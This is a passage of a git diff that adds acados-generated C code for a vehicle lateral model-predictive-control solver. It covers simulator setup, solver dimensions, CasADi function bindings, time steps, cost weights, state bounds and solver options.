capsule->sim_expl_ode_fun_casadi = (external_function_param_casadi *) malloc(sizeof(external_function_param_casadi)); + + capsule->sim_forw_vde_casadi->casadi_fun = &lat_expl_vde_forw; + capsule->sim_forw_vde_casadi->casadi_n_in = &lat_expl_vde_forw_n_in; + capsule->sim_forw_vde_casadi->casadi_n_out = &lat_expl_vde_forw_n_out; + capsule->sim_forw_vde_casadi->casadi_sparsity_in = &lat_expl_vde_forw_sparsity_in; + capsule->sim_forw_vde_casadi->casadi_sparsity_out = &lat_expl_vde_forw_sparsity_out; + capsule->sim_forw_vde_casadi->casadi_work = &lat_expl_vde_forw_work; + external_function_param_casadi_create(capsule->sim_forw_vde_casadi, np); + + capsule->sim_expl_ode_fun_casadi->casadi_fun = &lat_expl_ode_fun; + capsule->sim_expl_ode_fun_casadi->casadi_n_in = &lat_expl_ode_fun_n_in; + capsule->sim_expl_ode_fun_casadi->casadi_n_out = &lat_expl_ode_fun_n_out; + capsule->sim_expl_ode_fun_casadi->casadi_sparsity_in = &lat_expl_ode_fun_sparsity_in; + capsule->sim_expl_ode_fun_casadi->casadi_sparsity_out = &lat_expl_ode_fun_sparsity_out; + capsule->sim_expl_ode_fun_casadi->casadi_work = &lat_expl_ode_fun_work; + external_function_param_casadi_create(capsule->sim_expl_ode_fun_casadi, np); + + + + // sim plan & config + sim_solver_plan_t plan; + plan.sim_solver = ERK; + + // create correct config based on plan + sim_config * lat_sim_config = sim_config_create(plan); + capsule->acados_sim_config = lat_sim_config; + + // sim dims + void *lat_sim_dims = sim_dims_create(lat_sim_config); + capsule->acados_sim_dims = lat_sim_dims; + sim_dims_set(lat_sim_config, lat_sim_dims, "nx", &nx); + sim_dims_set(lat_sim_config, lat_sim_dims, "nu", &nu); + sim_dims_set(lat_sim_config, lat_sim_dims, "nz", &nz); + + + // sim opts + sim_opts *lat_sim_opts = sim_opts_create(lat_sim_config, lat_sim_dims); + capsule->acados_sim_opts = lat_sim_opts; + int tmp_int = 3; + sim_opts_set(lat_sim_config, lat_sim_opts, "newton_iter", &tmp_int); + sim_collocation_type collocation_type = GAUSS_LEGENDRE; + sim_opts_set(lat_sim_config, lat_sim_opts, "collocation_type", &collocation_type); + + + tmp_int = 4; + sim_opts_set(lat_sim_config, lat_sim_opts, "num_stages", &tmp_int); + tmp_int = 1; + sim_opts_set(lat_sim_config, lat_sim_opts, "num_steps", &tmp_int); + tmp_bool = 0; + sim_opts_set(lat_sim_config, lat_sim_opts, "jac_reuse", &tmp_bool); + + + // sim in / out + sim_in *lat_sim_in = sim_in_create(lat_sim_config, lat_sim_dims); + capsule->acados_sim_in = lat_sim_in; + sim_out *lat_sim_out = sim_out_create(lat_sim_config, lat_sim_dims); + capsule->acados_sim_out = lat_sim_out; + + sim_in_set(lat_sim_config, lat_sim_dims, + lat_sim_in, "T", &Tsim); + + // model functions + lat_sim_config->model_set(lat_sim_in->model, + "expl_vde_for", capsule->sim_forw_vde_casadi); + lat_sim_config->model_set(lat_sim_in->model, + "expl_ode_fun", capsule->sim_expl_ode_fun_casadi); + + // sim solver + sim_solver *lat_sim_solver = sim_solver_create(lat_sim_config, + lat_sim_dims, lat_sim_opts); + capsule->acados_sim_solver = lat_sim_solver; + + + /* initialize parameter values */ + double* p = calloc(np, sizeof(double)); + + + lat_acados_sim_update_params(capsule, p, np); + free(p); + + + /* initialize input */ + // x + double x0[4]; + for (int ii = 0; ii < 4; ii++) + x0[ii] = 0.0; + + sim_in_set(lat_sim_config, lat_sim_dims, + lat_sim_in, "x", x0); + + + // u + double u0[1]; + for (int ii = 0; ii < 1; ii++) + u0[ii] = 0.0; + + sim_in_set(lat_sim_config, lat_sim_dims, + lat_sim_in, "u", u0); + + // S_forw + double S_forw[20]; + for (int ii = 0; ii < 20; ii++) + S_forw[ii] = 0.0; + for (int ii = 0; ii < 4; ii++) + S_forw[ii + ii * 4 ] = 1.0; + + + sim_in_set(lat_sim_config, lat_sim_dims, + lat_sim_in, "S_forw", S_forw); + + int status = sim_precompute(lat_sim_solver, lat_sim_in, lat_sim_out); + + return status; +} + + +int lat_acados_sim_solve(sim_solver_capsule *capsule) +{ + // integrate dynamics using acados sim_solver + int status = sim_solve(capsule->acados_sim_solver, + capsule->acados_sim_in, capsule->acados_sim_out); + if (status != 0) + printf("error in lat_acados_sim_solve()! Exiting.\n"); + + return status; +} + + +int lat_acados_sim_free(sim_solver_capsule *capsule) +{ + // free memory + sim_solver_destroy(capsule->acados_sim_solver); + sim_in_destroy(capsule->acados_sim_in); + sim_out_destroy(capsule->acados_sim_out); + sim_opts_destroy(capsule->acados_sim_opts); + sim_dims_destroy(capsule->acados_sim_dims); + sim_config_destroy(capsule->acados_sim_config); + + // free external function + external_function_param_casadi_free(capsule->sim_forw_vde_casadi); + external_function_param_casadi_free(capsule->sim_expl_ode_fun_casadi); + + return 0; +} + + +int lat_acados_sim_update_params(sim_solver_capsule *capsule, double *p, int np) +{ + int status = 0; + int casadi_np = LAT_NP; + + if (casadi_np != np) { + printf("lat_acados_sim_update_params: trying to set %i parameters for external functions." + " External function has %i parameters. Exiting.\n", np, casadi_np); + exit(1); + } + capsule->sim_forw_vde_casadi[0].set_param(capsule->sim_forw_vde_casadi, p); + capsule->sim_expl_ode_fun_casadi[0].set_param(capsule->sim_expl_ode_fun_casadi, p); + + return status; +} + +/* getters pointers to C objects*/ +sim_config * lat_acados_get_sim_config(sim_solver_capsule *capsule) +{ + return capsule->acados_sim_config; +}; + +sim_in * lat_acados_get_sim_in(sim_solver_capsule *capsule) +{ + return capsule->acados_sim_in; +}; + +sim_out * lat_acados_get_sim_out(sim_solver_capsule *capsule) +{ + return capsule->acados_sim_out; +}; + +void * lat_acados_get_sim_dims(sim_solver_capsule *capsule) +{ + return capsule->acados_sim_dims; +}; + +sim_opts * lat_acados_get_sim_opts(sim_solver_capsule *capsule) +{ + return capsule->acados_sim_opts; +}; + +sim_solver * lat_acados_get_sim_solver(sim_solver_capsule *capsule) +{ + return capsule->acados_sim_solver; +}; + diff --git a/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/acados_solver_lat.c b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/acados_solver_lat.c new file mode 100644 index 000000000..f95047dae --- /dev/null +++ b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/acados_solver_lat.c @@ -0,0 +1,960 @@ +/* + * Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, + * Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, + * Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, + * Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl + * + * This file is part of acados. + * + * The 2-Clause BSD License + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, + * this list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE + * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR + * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF + * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS + * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN + * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) + * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE + * POSSIBILITY OF SUCH DAMAGE.; + */ + +// standard +#include +#include +#include +// acados +// #include "acados/utils/print.h" +#include "acados_c/ocp_nlp_interface.h" +#include "acados_c/external_function_interface.h" + +// example specific +#include "lat_model/lat_model.h" + + + + +#include "lat_cost/lat_cost_y_fun.h" +#include "lat_cost/lat_cost_y_0_fun.h" +#include "lat_cost/lat_cost_y_e_fun.h" + +#include "acados_solver_lat.h" + +#define NX LAT_NX +#define NZ LAT_NZ +#define NU LAT_NU +#define NP LAT_NP +#define NBX LAT_NBX +#define NBX0 LAT_NBX0 +#define NBU LAT_NBU +#define NSBX LAT_NSBX +#define NSBU LAT_NSBU +#define NSH LAT_NSH +#define NSG LAT_NSG +#define NSPHI LAT_NSPHI +#define NSHN LAT_NSHN +#define NSGN LAT_NSGN +#define NSPHIN LAT_NSPHIN +#define NSBXN LAT_NSBXN +#define NS LAT_NS +#define NSN LAT_NSN +#define NG LAT_NG +#define NBXN LAT_NBXN +#define NGN LAT_NGN +#define NY0 LAT_NY0 +#define NY LAT_NY +#define NYN LAT_NYN +// #define N LAT_N +#define NH LAT_NH +#define NPHI LAT_NPHI +#define NHN LAT_NHN +#define NPHIN LAT_NPHIN +#define NR LAT_NR + + +// ** solver data ** + +lat_solver_capsule * lat_acados_create_capsule(void) +{ + void* capsule_mem = malloc(sizeof(lat_solver_capsule)); + lat_solver_capsule *capsule = (lat_solver_capsule *) capsule_mem; + + return capsule; +} + + +int lat_acados_free_capsule(lat_solver_capsule *capsule) +{ + free(capsule); + return 0; +} + + +int lat_acados_create(lat_solver_capsule* capsule) +{ + int N_shooting_intervals = LAT_N; + double* new_time_steps = NULL; // NULL -> don't alter the code generated time-steps + return lat_acados_create_with_discretization(capsule, N_shooting_intervals, new_time_steps); +} + + +int lat_acados_update_time_steps(lat_solver_capsule* capsule, int N, double* new_time_steps) +{ + if (N != capsule->nlp_solver_plan->N) { + fprintf(stderr, "lat_acados_update_time_steps: given number of time steps (= %d) " \ + "differs from the currently allocated number of " \ + "time steps (= %d)!\n" \ + "Please recreate with new discretization and provide a new vector of time_stamps!\n", + N, capsule->nlp_solver_plan->N); + return 1; + } + + ocp_nlp_config * nlp_config = capsule->nlp_config; + ocp_nlp_dims * nlp_dims = capsule->nlp_dims; + ocp_nlp_in * nlp_in = capsule->nlp_in; + + for (int i = 0; i < N; i++) + { + ocp_nlp_in_set(nlp_config, nlp_dims, nlp_in, i, "Ts", &new_time_steps[i]); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, i, "scaling", &new_time_steps[i]); + } + return 0; +} + +/** + * Internal function for lat_acados_create: step 1 + */ +void lat_acados_create_1_set_plan(ocp_nlp_plan_t* nlp_solver_plan, const int N) +{ + assert(N == nlp_solver_plan->N); + + /************************************************ + * plan + ************************************************/ + nlp_solver_plan->nlp_solver = SQP_RTI; + + nlp_solver_plan->ocp_qp_solver_plan.qp_solver = PARTIAL_CONDENSING_HPIPM; + + nlp_solver_plan->nlp_cost[0] = NONLINEAR_LS; + for (int i = 1; i < N; i++) + nlp_solver_plan->nlp_cost[i] = NONLINEAR_LS; + + nlp_solver_plan->nlp_cost[N] = NONLINEAR_LS; + + for (int i = 0; i < N; i++) + { + nlp_solver_plan->nlp_dynamics[i] = CONTINUOUS_MODEL; + nlp_solver_plan->sim_solver_plan[i].sim_solver = ERK; + } + + for (int i = 0; i < N; i++) + {nlp_solver_plan->nlp_constraints[i] = BGH; + } + nlp_solver_plan->nlp_constraints[N] = BGH; +} + + +/** + * Internal function for lat_acados_create: step 2 + */ +ocp_nlp_dims* lat_acados_create_2_create_and_set_dimensions(lat_solver_capsule* capsule) +{ + ocp_nlp_plan_t* nlp_solver_plan = capsule->nlp_solver_plan; + const int N = nlp_solver_plan->N; + ocp_nlp_config* nlp_config = capsule->nlp_config; + + /************************************************ + * dimensions + ************************************************/ + #define NINTNP1MEMS 17 + int* intNp1mem = (int*)malloc( (N+1)*sizeof(int)*NINTNP1MEMS ); + + int* nx = intNp1mem + (N+1)*0; + int* nu = intNp1mem + (N+1)*1; + int* nbx = intNp1mem + (N+1)*2; + int* nbu = intNp1mem + (N+1)*3; + int* nsbx = intNp1mem + (N+1)*4; + int* nsbu = intNp1mem + (N+1)*5; + int* nsg = intNp1mem + (N+1)*6; + int* nsh = intNp1mem + (N+1)*7; + int* nsphi = intNp1mem + (N+1)*8; + int* ns = intNp1mem + (N+1)*9; + int* ng = intNp1mem + (N+1)*10; + int* nh = intNp1mem + (N+1)*11; + int* nphi = intNp1mem + (N+1)*12; + int* nz = intNp1mem + (N+1)*13; + int* ny = intNp1mem + (N+1)*14; + int* nr = intNp1mem + (N+1)*15; + int* nbxe = intNp1mem + (N+1)*16; + + for (int i = 0; i < N+1; i++) + { + // common + nx[i] = NX; + nu[i] = NU; + nz[i] = NZ; + ns[i] = NS; + // cost + ny[i] = NY; + // constraints + nbx[i] = NBX; + nbu[i] = NBU; + nsbx[i] = NSBX; + nsbu[i] = NSBU; + nsg[i] = NSG; + nsh[i] = NSH; + nsphi[i] = NSPHI; + ng[i] = NG; + nh[i] = NH; + nphi[i] = NPHI; + nr[i] = NR; + nbxe[i] = 0; + } + + // for initial state + nbx[0] = NBX0; + nsbx[0] = 0; + ns[0] = NS - NSBX; + nbxe[0] = 4; + ny[0] = NY0; + + // terminal - common + nu[N] = 0; + nz[N] = 0; + ns[N] = NSN; + // cost + ny[N] = NYN; + // constraint + nbx[N] = NBXN; + nbu[N] = 0; + ng[N] = NGN; + nh[N] = NHN; + nphi[N] = NPHIN; + nr[N] = 0; + + nsbx[N] = NSBXN; + nsbu[N] = 0; + nsg[N] = NSGN; + nsh[N] = NSHN; + nsphi[N] = NSPHIN; + + /* create and set ocp_nlp_dims */ + ocp_nlp_dims * nlp_dims = ocp_nlp_dims_create(nlp_config); + + ocp_nlp_dims_set_opt_vars(nlp_config, nlp_dims, "nx", nx); + ocp_nlp_dims_set_opt_vars(nlp_config, nlp_dims, "nu", nu); + ocp_nlp_dims_set_opt_vars(nlp_config, nlp_dims, "nz", nz); + ocp_nlp_dims_set_opt_vars(nlp_config, nlp_dims, "ns", ns); + + for (int i = 0; i <= N; i++) + { + ocp_nlp_dims_set_constraints(nlp_config, nlp_dims, i, "nbx", &nbx[i]); + ocp_nlp_dims_set_constraints(nlp_config, nlp_dims, i, "nbu", &nbu[i]); + ocp_nlp_dims_set_constraints(nlp_config, nlp_dims, i, "nsbx", &nsbx[i]); + ocp_nlp_dims_set_constraints(nlp_config, nlp_dims, i, "nsbu", &nsbu[i]); + ocp_nlp_dims_set_constraints(nlp_config, nlp_dims, i, "ng", &ng[i]); + ocp_nlp_dims_set_constraints(nlp_config, nlp_dims, i, "nsg", &nsg[i]); + ocp_nlp_dims_set_constraints(nlp_config, nlp_dims, i, "nbxe", &nbxe[i]); + } + ocp_nlp_dims_set_cost(nlp_config, nlp_dims, 0, "ny", &ny[0]); + for (int i = 1; i < N; i++) + ocp_nlp_dims_set_cost(nlp_config, nlp_dims, i, "ny", &ny[i]); + + for (int i = 0; i < N; i++) + { + } + ocp_nlp_dims_set_constraints(nlp_config, nlp_dims, N, "nh", &nh[N]); + ocp_nlp_dims_set_constraints(nlp_config, nlp_dims, N, "nsh", &nsh[N]); + ocp_nlp_dims_set_cost(nlp_config, nlp_dims, N, "ny", &ny[N]); + free(intNp1mem); +return nlp_dims; +} + + +/** + * Internal function for lat_acados_create: step 3 + */ +void lat_acados_create_3_create_and_set_functions(lat_solver_capsule* capsule) +{ + const int N = capsule->nlp_solver_plan->N; + ocp_nlp_config* nlp_config = capsule->nlp_config; + + /************************************************ + * external functions + ************************************************/ + +#define MAP_CASADI_FNC(__CAPSULE_FNC__, __MODEL_BASE_FNC__) do{ \ + capsule->__CAPSULE_FNC__.casadi_fun = & __MODEL_BASE_FNC__ ;\ + capsule->__CAPSULE_FNC__.casadi_n_in = & __MODEL_BASE_FNC__ ## _n_in; \ + capsule->__CAPSULE_FNC__.casadi_n_out = & __MODEL_BASE_FNC__ ## _n_out; \ + capsule->__CAPSULE_FNC__.casadi_sparsity_in = & __MODEL_BASE_FNC__ ## _sparsity_in; \ + capsule->__CAPSULE_FNC__.casadi_sparsity_out = & __MODEL_BASE_FNC__ ## _sparsity_out; \ + capsule->__CAPSULE_FNC__.casadi_work = & __MODEL_BASE_FNC__ ## _work; \ + external_function_param_casadi_create(&capsule->__CAPSULE_FNC__ , 2); \ + }while(false) + + + + + // explicit ode + capsule->forw_vde_casadi = (external_function_param_casadi *) malloc(sizeof(external_function_param_casadi)*N); + for (int i = 0; i < N; i++) { + MAP_CASADI_FNC(forw_vde_casadi[i], lat_expl_vde_forw); + } + + capsule->expl_ode_fun = (external_function_param_casadi *) malloc(sizeof(external_function_param_casadi)*N); + for (int i = 0; i < N; i++) { + MAP_CASADI_FNC(expl_ode_fun[i], lat_expl_ode_fun); + } + + + // nonlinear least squares function + MAP_CASADI_FNC(cost_y_0_fun, lat_cost_y_0_fun); + MAP_CASADI_FNC(cost_y_0_fun_jac_ut_xt, lat_cost_y_0_fun_jac_ut_xt); + MAP_CASADI_FNC(cost_y_0_hess, lat_cost_y_0_hess); + // nonlinear least squares cost + capsule->cost_y_fun = (external_function_param_casadi *) malloc(sizeof(external_function_param_casadi)*N); + for (int i = 0; i < N-1; i++) + { + MAP_CASADI_FNC(cost_y_fun[i], lat_cost_y_fun); + } + + capsule->cost_y_fun_jac_ut_xt = (external_function_param_casadi *) malloc(sizeof(external_function_param_casadi)*N); + for (int i = 0; i < N-1; i++) + { + MAP_CASADI_FNC(cost_y_fun_jac_ut_xt[i], lat_cost_y_fun_jac_ut_xt); + } + + capsule->cost_y_hess = (external_function_param_casadi *) malloc(sizeof(external_function_param_casadi)*N); + for (int i = 0; i < N-1; i++) + { + MAP_CASADI_FNC(cost_y_hess[i], lat_cost_y_hess); + } + // nonlinear least square function + MAP_CASADI_FNC(cost_y_e_fun, lat_cost_y_e_fun); + MAP_CASADI_FNC(cost_y_e_fun_jac_ut_xt, lat_cost_y_e_fun_jac_ut_xt); + MAP_CASADI_FNC(cost_y_e_hess, lat_cost_y_e_hess); + +#undef MAP_CASADI_FNC +} + + +/** + * Internal function for lat_acados_create: step 4 + */ +void lat_acados_create_4_set_default_parameters(lat_solver_capsule* capsule) { + const int N = capsule->nlp_solver_plan->N; + // initialize parameters to nominal value + double* p = calloc(NP, sizeof(double)); + + for (int i = 0; i <= N; i++) { + lat_acados_update_params(capsule, i, p, NP); + } + free(p); +} + + +/** + * Internal function for lat_acados_create: step 5 + */ +void lat_acados_create_5_set_nlp_in(lat_solver_capsule* capsule, const int N, double* new_time_steps) +{ + assert(N == capsule->nlp_solver_plan->N); + ocp_nlp_config* nlp_config = capsule->nlp_config; + ocp_nlp_dims* nlp_dims = capsule->nlp_dims; + + /************************************************ + * nlp_in + ************************************************/ +// ocp_nlp_in * nlp_in = ocp_nlp_in_create(nlp_config, nlp_dims); +// capsule->nlp_in = nlp_in; + ocp_nlp_in * nlp_in = capsule->nlp_in; + + // set up time_steps + + + if (new_time_steps) { + lat_acados_update_time_steps(capsule, N, new_time_steps); + } else {// time_steps are different + double* time_steps = malloc(N*sizeof(double)); + time_steps[0] = 0.009765625; + time_steps[1] = 0.029296875; + time_steps[2] = 0.048828125; + time_steps[3] = 0.068359375; + time_steps[4] = 0.087890625; + time_steps[5] = 0.107421875; + time_steps[6] = 0.126953125; + time_steps[7] = 0.146484375; + time_steps[8] = 0.166015625; + time_steps[9] = 0.185546875; + time_steps[10] = 0.205078125; + time_steps[11] = 0.224609375; + time_steps[12] = 0.244140625; + time_steps[13] = 0.263671875; + time_steps[14] = 0.283203125; + time_steps[15] = 0.302734375; + time_steps[16] = 0.322265625; + time_steps[17] = 0.341796875; + time_steps[18] = 0.361328125; + time_steps[19] = 0.380859375; + time_steps[20] = 0.400390625; + time_steps[21] = 0.419921875; + time_steps[22] = 0.439453125; + time_steps[23] = 0.458984375; + time_steps[24] = 0.478515625; + time_steps[25] = 0.498046875; + time_steps[26] = 0.517578125; + time_steps[27] = 0.537109375; + time_steps[28] = 0.556640625; + time_steps[29] = 0.576171875; + time_steps[30] = 0.595703125; + time_steps[31] = 0.615234375; + lat_acados_update_time_steps(capsule, N, time_steps); + free(time_steps); + } + + /**** Dynamics ****/ + for (int i = 0; i < N; i++) + { + ocp_nlp_dynamics_model_set(nlp_config, nlp_dims, nlp_in, i, "expl_vde_forw", &capsule->forw_vde_casadi[i]); + ocp_nlp_dynamics_model_set(nlp_config, nlp_dims, nlp_in, i, "expl_ode_fun", &capsule->expl_ode_fun[i]); + + } + + /**** Cost ****/ + double* W_0 = calloc(NY0*NY0, sizeof(double)); + // change only the non-zero elements: + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, 0, "W", W_0); + free(W_0); + + double* yref_0 = calloc(NY0, sizeof(double)); + // change only the non-zero elements: + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, 0, "yref", yref_0); + free(yref_0); + double* W = calloc(NY*NY, sizeof(double)); + // change only the non-zero elements: + + double* yref = calloc(NY, sizeof(double)); + // change only the non-zero elements: + + for (int i = 1; i < N; i++) + { + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, i, "W", W); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, i, "yref", yref); + } + free(W); + free(yref); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, 0, "nls_y_fun", &capsule->cost_y_0_fun); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, 0, "nls_y_fun_jac", &capsule->cost_y_0_fun_jac_ut_xt); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, 0, "nls_y_hess", &capsule->cost_y_0_hess); + for (int i = 1; i < N; i++) + { + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, i, "nls_y_fun", &capsule->cost_y_fun[i-1]); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, i, "nls_y_fun_jac", &capsule->cost_y_fun_jac_ut_xt[i-1]); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, i, "nls_y_hess", &capsule->cost_y_hess[i-1]); + } + + // terminal cost + double* yref_e = calloc(NYN, sizeof(double)); + // change only the non-zero elements: + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, N, "yref", yref_e); + free(yref_e); + + double* W_e = calloc(NYN*NYN, sizeof(double)); + // change only the non-zero elements: + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, N, "W", W_e); + free(W_e); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, N, "nls_y_fun", &capsule->cost_y_e_fun); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, N, "nls_y_fun_jac", &capsule->cost_y_e_fun_jac_ut_xt); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, N, "nls_y_hess", &capsule->cost_y_e_hess); + + + + /**** Constraints ****/ + + // bounds for initial stage + // x0 + int* idxbx0 = malloc(NBX0 * sizeof(int)); + idxbx0[0] = 0; + idxbx0[1] = 1; + idxbx0[2] = 2; + idxbx0[3] = 3; + + double* lubx0 = calloc(2*NBX0, sizeof(double)); + double* lbx0 = lubx0; + double* ubx0 = lubx0 + NBX0; + // change only the non-zero elements: + + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, 0, "idxbx", idxbx0); + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, 0, "lbx", lbx0); + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, 0, "ubx", ubx0); + free(idxbx0); + free(lubx0); + // idxbxe_0 + int* idxbxe_0 = malloc(4 * sizeof(int)); + + idxbxe_0[0] = 0; + idxbxe_0[1] = 1; + idxbxe_0[2] = 2; + idxbxe_0[3] = 3; + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, 0, "idxbxe", idxbxe_0); + free(idxbxe_0); + + /* constraints that are the same for initial and intermediate */ + + + + + + + + + // x + int* idxbx = malloc(NBX * sizeof(int)); + + idxbx[0] = 2; + idxbx[1] = 3; + double* lubx = calloc(2*NBX, sizeof(double)); + double* lbx = lubx; + double* ubx = lubx + NBX; + + lbx[0] = -1.5707963267948966; + ubx[0] = 1.5707963267948966; + lbx[1] = -0.8726646259971648; + ubx[1] = 0.8726646259971648; + + for (int i = 1; i < N; i++) + { + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, i, "idxbx", idxbx); + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, i, "lbx", lbx); + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, i, "ubx", ubx); + } + free(idxbx); + free(lubx); + + + + + + + + /* terminal constraints */ + + + + + + + + + + + + + + + +} + + +/** + * Internal function for lat_acados_create: step 6 + */ +void lat_acados_create_6_set_opts(lat_solver_capsule* capsule) +{ + const int N = capsule->nlp_solver_plan->N; + ocp_nlp_config* nlp_config = capsule->nlp_config; + ocp_nlp_dims* nlp_dims = capsule->nlp_dims; + void *nlp_opts = capsule->nlp_opts; + + /************************************************ + * opts + ************************************************/ + + + ocp_nlp_solver_opts_set(nlp_config, nlp_opts, "globalization", "fixed_step");int full_step_dual = 0; + ocp_nlp_solver_opts_set(nlp_config, capsule->nlp_opts, "full_step_dual", &full_step_dual); + + // set collocation type (relevant for implicit integrators) + sim_collocation_type collocation_type = GAUSS_LEGENDRE; + for (int i = 0; i < N; i++) + ocp_nlp_solver_opts_set_at_stage(nlp_config, nlp_opts, i, "dynamics_collocation_type", &collocation_type); + + // set up sim_method_num_steps + // all sim_method_num_steps are identical + int sim_method_num_steps = 1; + for (int i = 0; i < N; i++) + ocp_nlp_solver_opts_set_at_stage(nlp_config, nlp_opts, i, "dynamics_num_steps", &sim_method_num_steps); + + // set up sim_method_num_stages + // all sim_method_num_stages are identical + int sim_method_num_stages = 4; + for (int i = 0; i < N; i++) + ocp_nlp_solver_opts_set_at_stage(nlp_config, nlp_opts, i, "dynamics_num_stages", &sim_method_num_stages); + + int newton_iter_val = 3; + for (int i = 0; i < N; i++) + ocp_nlp_solver_opts_set_at_stage(nlp_config, nlp_opts, i, "dynamics_newton_iter", &newton_iter_val); + + + // set up sim_method_jac_reuse + bool tmp_bool = (bool) 0; + for (int i = 0; i < N; i++) + ocp_nlp_solver_opts_set_at_stage(nlp_config, nlp_opts, i, "dynamics_jac_reuse", &tmp_bool); + + double nlp_solver_step_length = 1; + ocp_nlp_solver_opts_set(nlp_config, nlp_opts, "step_length", &nlp_solver_step_length); + + double levenberg_marquardt = 0; + ocp_nlp_solver_opts_set(nlp_config, nlp_opts, "levenberg_marquardt", &levenberg_marquardt); + + /* options QP solver */ + int qp_solver_cond_N; + + const int qp_solver_cond_N_ori = 1; + qp_solver_cond_N = N < qp_solver_cond_N_ori ? N : qp_solver_cond_N_ori; // use the minimum value here + ocp_nlp_solver_opts_set(nlp_config, nlp_opts, "qp_cond_N", &qp_solver_cond_N); + // set HPIPM mode: should be done before setting other QP solver options + ocp_nlp_solver_opts_set(nlp_config, nlp_opts, "qp_hpipm_mode", "BALANCE"); + + + + int qp_solver_iter_max = 1; + ocp_nlp_solver_opts_set(nlp_config, nlp_opts, "qp_iter_max", &qp_solver_iter_max); + +int print_level = 0; + ocp_nlp_solver_opts_set(nlp_config, nlp_opts, "print_level", &print_level); + + + int ext_cost_num_hess = 0; +} + + +/** + * Internal function for lat_acados_create: step 7 + */ +void lat_acados_create_7_set_nlp_out(lat_solver_capsule* capsule) +{ + const int N = capsule->nlp_solver_plan->N; + ocp_nlp_config* nlp_config = capsule->nlp_config; + ocp_nlp_dims* nlp_dims = capsule->nlp_dims; + ocp_nlp_out* nlp_out = capsule->nlp_out; + + // initialize primal solution + double* xu0 = calloc(NX+NU, sizeof(double)); + double* x0 = xu0; + + // initialize with x0 + + + + double* u0 = xu0 + NX; + + for (int i = 0; i < N; i++) + { + // x0 + ocp_nlp_out_set(nlp_config, nlp_dims, nlp_out, i, "x", x0); + // u0 + ocp_nlp_out_set(nlp_config, nlp_dims, nlp_out, i, "u", u0); + } + ocp_nlp_out_set(nlp_config, nlp_dims, nlp_out, N, "x", x0); + free(xu0); +} + + +/** + * Internal function for lat_acados_create: step 8 + */ +//void lat_acados_create_8_create_solver(lat_solver_capsule* capsule) +//{ +// capsule->nlp_solver = ocp_nlp_solver_create(capsule->nlp_config, capsule->nlp_dims, capsule->nlp_opts); +//} + +/** + * Internal function for lat_acados_create: step 9 + */ +int lat_acados_create_9_precompute(lat_solver_capsule* capsule) { + int status = ocp_nlp_precompute(capsule->nlp_solver, capsule->nlp_in, capsule->nlp_out); + + if (status != ACADOS_SUCCESS) { + printf("\nocp_nlp_precompute failed!\n\n"); + exit(1); + } + + return status; +} + + +int lat_acados_create_with_discretization(lat_solver_capsule* capsule, int N, double* new_time_steps) +{ + // If N does not match the number of shooting intervals used for code generation, new_time_steps must be given. + if (N != LAT_N && !new_time_steps) { + fprintf(stderr, "lat_acados_create_with_discretization: new_time_steps is NULL " \ + "but the number of shooting intervals (= %d) differs from the number of " \ + "shooting intervals (= %d) during code generation! Please provide a new vector of time_stamps!\n", \ + N, LAT_N); + return 1; + } + + // number of expected runtime parameters + capsule->nlp_np = NP; + + // 1) create and set nlp_solver_plan; create nlp_config + capsule->nlp_solver_plan = ocp_nlp_plan_create(N); + lat_acados_create_1_set_plan(capsule->nlp_solver_plan, N); + capsule->nlp_config = ocp_nlp_config_create(*capsule->nlp_solver_plan); + + // 3) create and set dimensions + 